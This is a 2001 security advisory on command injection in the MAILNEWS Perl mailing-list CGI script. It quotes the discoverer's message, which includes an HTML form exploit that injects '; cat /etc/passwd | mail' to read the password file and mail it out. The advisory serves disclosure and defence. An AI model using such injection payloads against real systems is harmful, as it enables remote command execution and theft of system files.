Mailnews Cgi Script May Execute Arbitrary Shell Commands Supplied By Unauthorized Users Via the Network
SecurityTracker Alert ID: 1000949|
SecurityTracker URL: http://securitytracker.com/id/1000949
(Links to External Site)
Updated: Feb 28 2001|
Original Entry Date: Feb 21 2001
Execution of arbitrary code via network, User access via network|
Exploit Included: Yes |
Version(s): 1.1, 1.3|
The cgi-based MAILNEWS mailing list management software reportedly contains several vulnerabilities that allow an attacker to remotely supply shell commands to be executed by the cgi script.|
The most potentially serious vulnerability is that the software fails to appropriately filter certain input parameters. This allows an attacker to provide arbitrary shell commands to the cgi script that will be executed by the cgi script. In addition, the script does not properly protect and enforce passwords such that an unauthorized user without knowledge of the administrative password can add or delete users from an affected maillist.
The original message contains demonstration exploit code.
An attacker can remotely provide shell commands to be executed by the cgi script with the privileges of the cgi script.|
No solution was available at the time of this entry.|
Vendor URL: www.creuter.lu/programming/perl/index.asp (Links to External Site)
Authentication error, Input validation error|
|Underlying OS: Linux (Any), Apple (Legacy "classic" Mac), UNIX (Any), Windows (Any)|
|Underlying OS Comments: Vulnerable target is a Perl script|
Source Message Contents
Subject: CGI - mailnews.cgi vulnerability...|
<cat from source>
CGI-Script MAILNEWS 1.3
This script helps you to maintain a mailinglist.
##Tested Version: 1.1, 1.3
Author dont parse some characters and he use very stupid "password
protection". We can add or delete users from maillist without known
admin password. But this is small problem ;] . Lets see what we can do
open (MAIL, "|$mailprog $member") || die "Can't open $mailprog!\n";
where $mailprog [default] is sendmail and $member is users from usersfile.
Now we can do something like this. Add user "; cat /etc/passwd | mail
email@example.com' and use subroutine to execute this code :]
Simple exploit in html:
<INPUT type=hidden NAME="action" value="subscribe">
User to add with ; [ex:" ; cat /etc/passwd |mail firstname.lastname@example.org"
without qoutas ofcoz ]<INPUT NAME="address" TYPE="TEXT">
<INPUT TYPE="SUBMIT" VALUE="Submit">
Execute command :] </A>
<CENTER> Peace... </CENTER>
Who : Kanedaaa
***$$$### " I moze bardzo wielu nie zrozumie tych slow...
Ale nie ma litosci dla SKURWYSYNOW .... " ###$$*
email@example.com Bohater ... Szef ... Abuser ... Cucumber Team Member... Bzz..